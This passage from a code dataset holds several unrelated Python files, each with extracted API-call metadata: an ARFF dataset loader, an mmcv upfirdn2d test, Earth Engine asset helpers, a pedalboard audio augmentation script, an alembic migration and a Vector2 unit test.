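    # condition; convert them below into the representation requested by mask_type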
mask=[]
if mask_type=="rowcol":
for i in dum_mask:
mask.append(dum_asc.get_row_col_from_index(i))
elif mask_type=="index":
for i in dum_mask:
mask.append(i)
elif mask_type=="latlon":
for i in dum_mask:
mask.append(dum_asc.get_coord_from_index(i))
elif mask_type=="np_grid":
mask = np.zeros((dum_asc.nrows, dum_asc.ncols), dtype=bool)
mask[:,:] = True
for i in dum_mask:
row, col = dum_asc.get_row_col_from_index(i)
mask[row,col]=False
return mask
| [
"ascraster.create_mask",
"numpy.zeros"
]
| [((503, 576), 'ascraster.create_mask', 'ascraster.create_mask', (['mask_asc_fn', 'mask_id'], {'logical': 'logical', 'numtype': 'int'}), '(mask_asc_fn, mask_id, logical=logical, numtype=int)\n', (524, 576), False, 'import ascraster\n'), ((930, 982), 'numpy.zeros', 'np.zeros', (['(dum_asc.nrows, dum_asc.ncols)'], {'dtype': 'bool'}), '((dum_asc.nrows, dum_asc.ncols), dtype=bool)\n', (938, 982), True, 'import numpy as np\n')] |
from io import TextIOWrapper
import math
from typing import TypeVar
import random
import os
from Settings import Settings
class Dataset:
DataT = TypeVar('DataT')
WIN_NL = "\r\n"
LINUX_NL = "\n"
def __init__(self, path:str, filename:str, newline:str = WIN_NL) -> None:
self.path_ = path
self.filename_ = filename
self.loaded_ = False
self.parsed_ = False
self.data_ = None
self.nl = newline
self.classes_ = set()
self.attributes_ = []
self.types_ = []
self.data_ = []
def Data(self) -> list:
return self.data_
def Attributes(self) -> list:
return self.attributes_
def Types(self) -> list:
return self.types_
def Classes(self) -> list:
return self.classes_
def Load(self, reload:bool = False) -> DataT:
if not self.loaded_ or reload:
self.file_ = open(os.sep.join([self.path_, self.filename_]))
self.loaded_ = True
# If we reload, then we want to reparse as well.
return self.Parse_(reload)
def Parse_(self, reparse:bool = False) -> DataT:
if not self.loaded_:
# Silently return instead of raising an exception because
# this method is not intended to be used outside of the
# class. Although, it can be used that way if needed.
return
if not self.parsed_ or reparse:
self.Parse_Hook_(self.file_.read())
return self.data_
def Parse_Hook_(self, data:str) -> None:
self.data_ = data
def __del__(self):
if self.loaded_:
self.file_.close()
class ArffRow:
ATTR_LABEL = '@ATTRIBUTE ' # need the space at the end here
DATA_LABEL = '@DATA'
ATTR_LEN = len(ATTR_LABEL)
DATA_LEN = len(DATA_LABEL)
Attributes = []
Types = []
Data = []
Classes = set()
IsCollecting_ = False
@classmethod
def Reset(cls):
cls.Attributes = []
cls.Types = []
cls.Data = []
cls.Classes = set()
cls.IsCollecting_ = False
def __init__(self, line:str, nl:str) -> None:
self.line_ = line
self.len_ = len(line)
self.nl_ = nl
def Len(self) -> str:
return self.len_
def HasAttributeLabel(self) -> bool:
return self.len_ >= ArffRow.ATTR_LEN and self.line_[0:ArffRow.ATTR_LEN] == ArffRow.ATTR_LABEL
def HasDataLabel(self) -> bool:
return self.len_ >= ArffRow.DATA_LEN and self.line_[0:ArffRow.DATA_LEN] == ArffRow.DATA_LABEL
def GetAttributeData(self) -> tuple[str, str]:
namePosition = 0
for (i, char) in enumerate(self.line_[ArffRow.ATTR_LEN:]):
if char == '\t':
namePosition = i + ArffRow.ATTR_LEN
break
return (self.line_[ArffRow.ATTR_LEN:namePosition], self.line_[namePosition + 1:])
def Parse(self):
if ArffRow.IsCollecting_ and self.len_ > 1:
ArffRow.Data.append(self.line_.split(','))
ArffRow.Classes.add(ArffRow.Data[-1][-1])
elif self.HasDataLabel():
ArffRow.IsCollecting_ = True
elif self.HasAttributeLabel():
attrData = self.GetAttributeData()
ArffRow.Attributes.append(attrData[0])
ArffRow.Types.append(attrData[1])
class ArffDataset(Dataset):
# ARFF (Attribute-Relation File Format)
#def __init__(self, path:str, filename:str, newline:str = Dataset.WIN_NL) -> None:
# super().__init__(path, filename, newline)
#
# self.parser_ = {
# 'attributesLoaded': False,
# }
def Parse_Hook_(self, data:str) -> None:
ArffRow.Reset()
rows = [ArffRow(line, self.nl) for line in data.split(self.nl)]
for row in rows:
row.Parse()
for attribute in ArffRow.Attributes:
self.attributes_.append(attribute)
for typeName in ArffRow.Types:
self.types_.append(typeName)
for datum in ArffRow.Data:
self.data_.append(datum)
self.classes_ = self.classes_.union(ArffRow.Classes)
classes = list(self.classes_)
attribute_maxes = {}
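        # replace each class label with a one-hot vector and normalise every
        # REAL/INTEGER column by the largest-magnitude value observed for it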
for row in self.data_:
classIndex = classes.index(row[-1])
row[-1] = [1 if i == classIndex else 0 for (i, value) in enumerate(classes)]
for i in range(len(row)):
if self.types_[i] == 'REAL':
row[i] = float(row[i])
elif self.types_[i] == 'INTEGER':
row[i] = int(row[i])
else:
continue
if i not in attribute_maxes:
attribute_maxes[i] = 0
if abs(row[i]) > attribute_maxes[i]:
attribute_maxes[i] = row[i]
for i in range(len(row)):
if self.types_[i] == 'REAL' or self.types_[i] == 'INTEGER':
row[i] = row[i] / attribute_maxes[i]
self.data_ = self.RowSort(self.data_)
def LexOrder(self, item1, item2):
num_fields = len(item1)
for i in range(num_fields):
if item1[i] != item2[i]:
if item1[i] < item2[i]:
return -1
else:
return 1
return 0
def RowSort(self, rows):
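        # recursive merge sort over the rows, using LexOrder as the comparator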
rows_len = len(rows)
if rows_len > 2:
result1 = self.RowSort(rows[0: math.floor(rows_len * 0.5)])
result2 = self.RowSort(rows[math.floor(rows_len * 0.5):])
sorted_rows = []
item1 = None
item2 = None
while len(result1) > 0 or len(result2) > 0:
if len(result1) > 0 and len(result2) > 0 and item1 == None and item2 == None:
item1 = result1.pop(0)
item2 = result2.pop(0)
elif len(result1) > 0 and item1 == None:
item1 = result1.pop(0)
elif len(result2) > 0 and item2 == None:
item2 = result2.pop(0)
order = 0
if item1 == None and item2 != None:
order = 1
elif item1 != None and item2 == None:
order = -1
else:
order = self.LexOrder(item1, item2)
if order == -1:
sorted_rows.append(item1)
item1 = None
elif order == 1:
sorted_rows.append(item2)
item2 = None
else:
sorted_rows.append(item1)
sorted_rows.append(item2)
item1 = None
item2 = None
if item1 != None:
sorted_rows.append(item1)
if item2 != None:
sorted_rows.append(item2)
return sorted_rows
        elif rows_len < 2:
            # Empty and single-element lists are already sorted.
            return rows
else:
order = self.LexOrder(rows[0], rows[1])
if order == 1:
rows.reverse()
return rows
    def Fetch(self, *fields:str, limit:int = None, offset:int = 0):
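        # Return the requested columns (looked up by attribute name) for rows
        # in the window [offset, offset + limit); unknown field names are
        # silently ignored.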
cols = []
data = []
# iterate over the field names and find the column indices
# for names that match the requested field names
for (i, field) in enumerate(fields):
try:
cols.append(self.attributes_.index(field))
except ValueError:
pass
end = limit
if limit != None:
end += offset
for row in self.data_[offset:end]:
data.append([row[i] for i in cols])
return data
def FetchFilter_(self, i, value):
# Not used any more
#if self.types_[i] == 'REAL':
# return float(value)
#elif self.types_[i] == 'INTEGER':
# return int(value)
#else:
# return value
pass
def Size(self):
length = len(self.data_)
if length == 0:
return (len(self.data_), None)
return (len(self.data_), len(self.data_[0]))
def Shuffle(self):
random.shuffle(self.data_)
class Pistachio(ArffDataset):
SettingsKey = 'PistachioDataset'
def __init__(self, newline:str = Dataset.WIN_NL) -> None:
settings = Settings.Data()
super().__init__(
path = settings[Pistachio.SettingsKey]['Path'],
filename = settings[Pistachio.SettingsKey]['FileName'],
newline = newline
)
#pist = Pistachio(Dataset.LINUX_NL)
#
#for row in pist.Load()[0:10]:
# print(row)
| [
"random.shuffle",
"math.floor",
"os.sep.join",
"Settings.Settings.Data",
"typing.TypeVar"
]
| [((157, 173), 'typing.TypeVar', 'TypeVar', (['"""DataT"""'], {}), "('DataT')\n", (164, 173), False, 'from typing import TypeVar\n'), ((6860, 6886), 'random.shuffle', 'random.shuffle', (['self.data_'], {}), '(self.data_)\n', (6874, 6886), False, 'import random\n'), ((7037, 7052), 'Settings.Settings.Data', 'Settings.Data', ([], {}), '()\n', (7050, 7052), False, 'from Settings import Settings\n'), ((841, 882), 'os.sep.join', 'os.sep.join', (['[self.path_, self.filename_]'], {}), '([self.path_, self.filename_])\n', (852, 882), False, 'import os\n'), ((4738, 4764), 'math.floor', 'math.floor', (['(rows_len * 0.5)'], {}), '(rows_len * 0.5)\n', (4748, 4764), False, 'import math\n'), ((4799, 4825), 'math.floor', 'math.floor', (['(rows_len * 0.5)'], {}), '(rows_len * 0.5)\n', (4809, 4825), False, 'import math\n')] |
# Copyright (c) OpenMMLab. All rights reserved.
import pytest
import torch
_USING_PARROTS = True
try:
from parrots.autograd import gradcheck
except ImportError:
from torch.autograd import gradcheck, gradgradcheck
_USING_PARROTS = False
class TestUpFirDn2d:
"""Unit test for UpFirDn2d.
    Here, we just test the basic case of the upsample version. More general
    tests will be included in other unit tests for the UpFirDnUpsample and
    UpFirDnDownSample modules.
"""
@classmethod
def setup_class(cls):
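        # Build a separable 4x4 smoothing kernel from the outer product of
        # [1, 3, 3, 1] and normalize it to sum to one.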
kernel_1d = torch.tensor([1., 3., 3., 1.])
cls.kernel = kernel_1d[:, None] * kernel_1d[None, :]
cls.kernel = cls.kernel / cls.kernel.sum()
cls.factor = 2
pad = cls.kernel.shape[0] - cls.factor
cls.pad = ((pad + 1) // 2 + cls.factor - 1, pad // 2)
cls.input_tensor = torch.randn((2, 3, 4, 4), requires_grad=True)
@pytest.mark.skipif(not torch.cuda.is_available(), reason='requires cuda')
def test_upfirdn2d(self):
from mmcv.ops import upfirdn2d
if _USING_PARROTS:
gradcheck(
upfirdn2d,
(self.input_tensor.cuda(),
self.kernel.type_as(
self.input_tensor).cuda(), self.factor, 1, self.pad),
delta=1e-4,
pt_atol=1e-3)
else:
gradcheck(
upfirdn2d,
(self.input_tensor.cuda(),
self.kernel.type_as(
self.input_tensor).cuda(), self.factor, 1, self.pad),
eps=1e-4,
atol=1e-3)
gradgradcheck(
upfirdn2d,
(self.input_tensor.cuda(),
self.kernel.type_as(
self.input_tensor).cuda(), self.factor, 1, self.pad),
eps=1e-4,
atol=1e-3)
| [
"torch.tensor",
"torch.cuda.is_available",
"torch.randn"
]
| [((550, 584), 'torch.tensor', 'torch.tensor', (['[1.0, 3.0, 3.0, 1.0]'], {}), '([1.0, 3.0, 3.0, 1.0])\n', (562, 584), False, 'import torch\n'), ((853, 898), 'torch.randn', 'torch.randn', (['(2, 3, 4, 4)'], {'requires_grad': '(True)'}), '((2, 3, 4, 4), requires_grad=True)\n', (864, 898), False, 'import torch\n'), ((928, 953), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (951, 953), False, 'import torch\n')] |
import pandas as pd
from tqdm import tqdm
data_list = []
def get_questions(row):
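    # Build one multiple-choice item for this row: the row's description is
    # the correct answer and descriptions sampled from other rows act as
    # distractors.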
global data_list
random_samples = df.sample(n=num_choices - 1)
distractors = random_samples["description"].tolist()
data = {
"question": "What is " + row["label"] + "?",
"correct": row["description"],
"distractors": distractors,
"knowledge": "{" + row["label"] + " : " + row["description"] + "}",
}
data_list.append(data)
debug = False
num_choices = 4
tqdm.pandas(desc="Progress")
df = pd.read_pickle("data/augmented_datasets/pickle/label_description.pkl")
if debug:
df = df.iloc[:10]
df.progress_apply(get_questions, axis=1)
new_df = pd.DataFrame(data_list)
if not debug:
new_df.to_pickle("data/augmented_datasets/pickle/description_qa_knowledge.pkl")
else:
__import__("pudb").set_trace()
| [
"pandas.read_pickle",
"tqdm.tqdm.pandas",
"pandas.DataFrame"
]
| [((495, 523), 'tqdm.tqdm.pandas', 'tqdm.pandas', ([], {'desc': '"""Progress"""'}), "(desc='Progress')\n", (506, 523), False, 'from tqdm import tqdm\n'), ((529, 599), 'pandas.read_pickle', 'pd.read_pickle', (['"""data/augmented_datasets/pickle/label_description.pkl"""'], {}), "('data/augmented_datasets/pickle/label_description.pkl')\n", (543, 599), True, 'import pandas as pd\n'), ((689, 712), 'pandas.DataFrame', 'pd.DataFrame', (['data_list'], {}), '(data_list)\n', (701, 712), True, 'import pandas as pd\n')] |
import json
from threading import Semaphore
import ee
from flask import request
from google.auth import crypt
from google.oauth2 import service_account
from google.oauth2.credentials import Credentials
service_account_credentials = None
import logging
export_semaphore = Semaphore(5)
get_info_semaphore = Semaphore(2)
def init_service_account_credentials(args):
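    """Load the GEE service-account key and build credentials that include the Drive scope."""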
global service_account_credentials
with open(args['gee_key_path'], 'r') as file_:
key_data = file_.read()
signer = crypt.RSASigner.from_string(key_data)
service_account_credentials = service_account.Credentials(
signer=signer,
service_account_email=args['gee_email'],
token_uri=ee.oauth.TOKEN_URI,
scopes=ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive']
)
def init_ee():
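    """Initialize Earth Engine for this thread, preferring the requesting
    user's Google access token over the service-account credentials."""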
credentials = service_account_credentials
if 'sepal-user' in request.headers:
user = json.loads(request.headers['sepal-user'])
googleTokens = user.get('googleTokens', None)
if googleTokens:
credentials = Credentials(googleTokens['accessToken'])
ee.InitializeThread(credentials)
def to_asset_id(asset_path):
asset_roots = ee.data.getAssetRoots()
if not asset_roots:
raise Exception('User has no GEE asset roots')
return asset_roots[0]['id'] + '/' + asset_path
def delete_asset_collection(asset_id):
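    """Recursively delete an asset: remove its child images first, then the asset itself."""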
logging.info('Recursively deleting ' + asset_id)
if ee.data.getInfo(asset_id):
images = ee.data.getList({
'id': asset_id,
'fields': 'id'
})
for image in images:
ee.data.deleteAsset(image['id'])
logging.info('Deleted ' + image['id'])
ee.data.deleteAsset(asset_id)
logging.info('Deleted ' + asset_id)
def create_asset_image_collection(asset_id):
delete_asset_collection(asset_id)
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_IMAGE_COLL,
mk_parents=True
)
def create_asset_folder(asset_id):
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_FOLDER,
mk_parents=True
)
def get_info(ee_object):
try:
get_info_semaphore.acquire()
return ee_object.getInfo()
finally:
get_info_semaphore.release()
| [
"ee.data.getList",
"ee.InitializeThread",
"ee.data.getAssetRoots",
"json.loads",
"google.oauth2.credentials.Credentials",
"ee.data.deleteAsset",
"google.auth.crypt.RSASigner.from_string",
"threading.Semaphore",
"ee.data.create_assets",
"ee.data.getInfo",
"google.oauth2.service_account.Credentials",
"logging.info"
]
| [((274, 286), 'threading.Semaphore', 'Semaphore', (['(5)'], {}), '(5)\n', (283, 286), False, 'from threading import Semaphore\n'), ((308, 320), 'threading.Semaphore', 'Semaphore', (['(2)'], {}), '(2)\n', (317, 320), False, 'from threading import Semaphore\n'), ((503, 540), 'google.auth.crypt.RSASigner.from_string', 'crypt.RSASigner.from_string', (['key_data'], {}), '(key_data)\n', (530, 540), False, 'from google.auth import crypt\n'), ((575, 766), 'google.oauth2.service_account.Credentials', 'service_account.Credentials', ([], {'signer': 'signer', 'service_account_email': "args['gee_email']", 'token_uri': 'ee.oauth.TOKEN_URI', 'scopes': "(ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive'])"}), "(signer=signer, service_account_email=args[\n 'gee_email'], token_uri=ee.oauth.TOKEN_URI, scopes=ee.oauth.SCOPES + [\n 'https://www.googleapis.com/auth/drive'])\n", (602, 766), False, 'from google.oauth2 import service_account\n'), ((1105, 1137), 'ee.InitializeThread', 'ee.InitializeThread', (['credentials'], {}), '(credentials)\n', (1124, 1137), False, 'import ee\n'), ((1187, 1210), 'ee.data.getAssetRoots', 'ee.data.getAssetRoots', ([], {}), '()\n', (1208, 1210), False, 'import ee\n'), ((1386, 1434), 'logging.info', 'logging.info', (["('Recursively deleting ' + asset_id)"], {}), "('Recursively deleting ' + asset_id)\n", (1398, 1434), False, 'import logging\n'), ((1442, 1467), 'ee.data.getInfo', 'ee.data.getInfo', (['asset_id'], {}), '(asset_id)\n', (1457, 1467), False, 'import ee\n'), ((1866, 1973), 'ee.data.create_assets', 'ee.data.create_assets', ([], {'asset_ids': '[asset_id]', 'asset_type': 'ee.data.ASSET_TYPE_IMAGE_COLL', 'mk_parents': '(True)'}), '(asset_ids=[asset_id], asset_type=ee.data.\n ASSET_TYPE_IMAGE_COLL, mk_parents=True)\n', (1887, 1973), False, 'import ee\n'), ((2040, 2143), 'ee.data.create_assets', 'ee.data.create_assets', ([], {'asset_ids': '[asset_id]', 'asset_type': 'ee.data.ASSET_TYPE_FOLDER', 'mk_parents': '(True)'}), '(asset_ids=[asset_id], asset_type=ee.data.\n ASSET_TYPE_FOLDER, mk_parents=True)\n', (2061, 2143), False, 'import ee\n'), ((913, 954), 'json.loads', 'json.loads', (["request.headers['sepal-user']"], {}), "(request.headers['sepal-user'])\n", (923, 954), False, 'import json\n'), ((1486, 1535), 'ee.data.getList', 'ee.data.getList', (["{'id': asset_id, 'fields': 'id'}"], {}), "({'id': asset_id, 'fields': 'id'})\n", (1501, 1535), False, 'import ee\n'), ((1703, 1732), 'ee.data.deleteAsset', 'ee.data.deleteAsset', (['asset_id'], {}), '(asset_id)\n', (1722, 1732), False, 'import ee\n'), ((1741, 1776), 'logging.info', 'logging.info', (["('Deleted ' + asset_id)"], {}), "('Deleted ' + asset_id)\n", (1753, 1776), False, 'import logging\n'), ((1060, 1100), 'google.oauth2.credentials.Credentials', 'Credentials', (["googleTokens['accessToken']"], {}), "(googleTokens['accessToken'])\n", (1071, 1100), False, 'from google.oauth2.credentials import Credentials\n'), ((1611, 1643), 'ee.data.deleteAsset', 'ee.data.deleteAsset', (["image['id']"], {}), "(image['id'])\n", (1630, 1643), False, 'import ee\n'), ((1656, 1694), 'logging.info', 'logging.info', (["('Deleted ' + image['id'])"], {}), "('Deleted ' + image['id'])\n", (1668, 1694), False, 'import logging\n')] |
from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard
import soundfile as sf
if __name__ == '__main__':
    # replace with the path of the unprocessed piano file if necessary
fn_wav_source = 'live_grand_piano.wav'
# augmentation settings using Pedalboard library
settings = {'rev-': [Reverb(room_size=.4)],
'rev+': [Reverb(room_size=.8)],
'comp+': [Compressor(threshold_db=-15, ratio=20)],
'comp-': [Compressor(threshold_db=-10, ratio=10)],
'gain+': [Gain(gain_db=15)], # clipping
'gain-': [Gain(gain_db=5)],
'lpf-': [LowpassFilter(cutoff_frequency_hz=50)],
'lpf+': [LowpassFilter(cutoff_frequency_hz=250)]}
# create augmented versions
for s in settings.keys():
# load unprocessed piano recording
audio, sample_rate = sf.read(fn_wav_source)
# create Pedalboard object
board = Pedalboard(settings[s])
# create augmented audio
effected = board(audio, sample_rate)
# save it
fn_target = fn_wav_source.replace('.wav', f'_{s}.wav')
sf.write(fn_target, effected, sample_rate)
| [
"pedalboard.LowpassFilter",
"pedalboard.Pedalboard",
"pedalboard.Reverb",
"soundfile.write",
"pedalboard.Compressor",
"pedalboard.Gain",
"soundfile.read"
]
| [((883, 905), 'soundfile.read', 'sf.read', (['fn_wav_source'], {}), '(fn_wav_source)\n', (890, 905), True, 'import soundfile as sf\n'), ((958, 981), 'pedalboard.Pedalboard', 'Pedalboard', (['settings[s]'], {}), '(settings[s])\n', (968, 981), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((1151, 1193), 'soundfile.write', 'sf.write', (['fn_target', 'effected', 'sample_rate'], {}), '(fn_target, effected, sample_rate)\n', (1159, 1193), True, 'import soundfile as sf\n'), ((310, 331), 'pedalboard.Reverb', 'Reverb', ([], {'room_size': '(0.4)'}), '(room_size=0.4)\n', (316, 331), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((358, 379), 'pedalboard.Reverb', 'Reverb', ([], {'room_size': '(0.8)'}), '(room_size=0.8)\n', (364, 379), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((407, 445), 'pedalboard.Compressor', 'Compressor', ([], {'threshold_db': '(-15)', 'ratio': '(20)'}), '(threshold_db=-15, ratio=20)\n', (417, 445), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((474, 512), 'pedalboard.Compressor', 'Compressor', ([], {'threshold_db': '(-10)', 'ratio': '(10)'}), '(threshold_db=-10, ratio=10)\n', (484, 512), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((541, 557), 'pedalboard.Gain', 'Gain', ([], {'gain_db': '(15)'}), '(gain_db=15)\n', (545, 557), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((598, 613), 'pedalboard.Gain', 'Gain', ([], {'gain_db': '(5)'}), '(gain_db=5)\n', (602, 613), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((641, 678), 'pedalboard.LowpassFilter', 'LowpassFilter', ([], {'cutoff_frequency_hz': '(50)'}), '(cutoff_frequency_hz=50)\n', (654, 678), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((706, 744), 'pedalboard.LowpassFilter', 'LowpassFilter', ([], {'cutoff_frequency_hz': '(250)'}), '(cutoff_frequency_hz=250)\n', (719, 744), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n')] |
"""add_request_system
Revision: <KEY>
Revises: 31b92bf6506d
Created: 2013-07-23 02:49:09.342814
"""
revision = '<KEY>'
down_revision = '31b92bf6506d'
from alembic import op
from spire.schema.fields import *
from spire.mesh import SurrogateType
from sqlalchemy import (Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint,
CheckConstraint, UniqueConstraint)
from sqlalchemy.dialects import postgresql
def upgrade():
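    # Create the request system tables: request, request_slot,
    # request_attachment, request_product and message.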
op.create_table('request',
Column('id', UUIDType(), nullable=False),
Column('name', TextType(), nullable=False),
Column('status', EnumerationType(), nullable=False),
Column('originator', TokenType(), nullable=False),
Column('assignee', TokenType(), nullable=False),
PrimaryKeyConstraint('id'),
UniqueConstraint('name'),
)
op.create_table('request_slot',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('token', TokenType(), nullable=False),
Column('title', TextType(), nullable=True),
Column('slot', TokenType(), nullable=False),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
UniqueConstraint('request_id','token'),
)
op.create_table('request_attachment',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('token', TokenType(), nullable=True),
Column('title', TextType(), nullable=True),
Column('attachment', SurrogateType(), nullable=False),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
)
op.create_table('request_product',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('token', TokenType(), nullable=False),
Column('title', TextType(), nullable=True),
Column('product', SurrogateType(), nullable=False),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
UniqueConstraint('request_id','token'),
)
op.create_table('message',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('author', TokenType(), nullable=False),
Column('occurrence', DateTimeType(timezone=True), nullable=False),
Column('message', TextType(), nullable=True),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
)
def downgrade():
op.drop_table('message')
op.drop_table('request_product')
op.drop_table('request_attachment')
op.drop_table('request_slot')
op.drop_table('request')
| [
"sqlalchemy.ForeignKeyConstraint",
"alembic.op.drop_table",
"spire.mesh.SurrogateType",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.UniqueConstraint"
]
| [((2690, 2714), 'alembic.op.drop_table', 'op.drop_table', (['"""message"""'], {}), "('message')\n", (2703, 2714), False, 'from alembic import op\n'), ((2719, 2751), 'alembic.op.drop_table', 'op.drop_table', (['"""request_product"""'], {}), "('request_product')\n", (2732, 2751), False, 'from alembic import op\n'), ((2756, 2791), 'alembic.op.drop_table', 'op.drop_table', (['"""request_attachment"""'], {}), "('request_attachment')\n", (2769, 2791), False, 'from alembic import op\n'), ((2796, 2825), 'alembic.op.drop_table', 'op.drop_table', (['"""request_slot"""'], {}), "('request_slot')\n", (2809, 2825), False, 'from alembic import op\n'), ((2830, 2854), 'alembic.op.drop_table', 'op.drop_table', (['"""request"""'], {}), "('request')\n", (2843, 2854), False, 'from alembic import op\n'), ((751, 777), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (771, 777), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((787, 811), 'sqlalchemy.UniqueConstraint', 'UniqueConstraint', (['"""name"""'], {}), "('name')\n", (803, 811), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1130, 1202), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (1150, 1202), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1212, 1238), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1232, 1238), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1248, 1287), 'sqlalchemy.UniqueConstraint', 'UniqueConstraint', (['"""request_id"""', '"""token"""'], {}), "('request_id', 'token')\n", (1264, 1287), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1620, 1692), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (1640, 1692), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1702, 1728), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1722, 1728), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2057, 2129), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (2077, 2129), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2139, 2165), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (2159, 2165), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2175, 2214), 'sqlalchemy.UniqueConstraint', 'UniqueConstraint', (['"""request_id"""', '"""token"""'], {}), "('request_id', 'token')\n", (2191, 2214), False, 
'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2552, 2624), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (2572, 2624), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2634, 2660), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (2654, 2660), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1578, 1593), 'spire.mesh.SurrogateType', 'SurrogateType', ([], {}), '()\n', (1591, 1593), False, 'from spire.mesh import SurrogateType\n'), ((2015, 2030), 'spire.mesh.SurrogateType', 'SurrogateType', ([], {}), '()\n', (2028, 2030), False, 'from spire.mesh import SurrogateType\n')] |
# Copyright (C) 2021 Open Source Robotics Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import math
from ignition.math import Vector2d
from ignition.math import Vector2f
class TestVector2(unittest.TestCase):
def test_construction(self):
v = Vector2d()
self.assertAlmostEqual(0.0, v.x())
self.assertAlmostEqual(0.0, v.y())
vec = Vector2d(1, 0)
self.assertEqual(vec.x(), 1)
self.assertEqual(vec.y(), 0)
vec2 = Vector2d(vec)
self.assertEqual(vec2, vec)
# Copy
vec3 = vec
self.assertEqual(vec3, vec)
# Inequality
vec4 = Vector2d()
self.assertNotEqual(vec, vec4)
def test_vector2(self):
v = Vector2d(1, 2)
# Distance
self.assertAlmostEqual(2.236, v.distance(Vector2d()), delta=1e-2)
# Normalize
v.normalize()
self.assertTrue(v.equal(Vector2d(0.447214, 0.894427), 1e-4))
# Set
v.set(4, 5)
self.assertTrue(v.equal(Vector2d(4, 5), 1e-4))
# Abs
v.set(-1, -2)
self.assertTrue(v.abs().equal(Vector2d(1, 2), 1e-4))
        # __eq__
v = Vector2d(6, 7)
self.assertTrue(v.equal(Vector2d(6, 7), 1e-4))
        # __add__
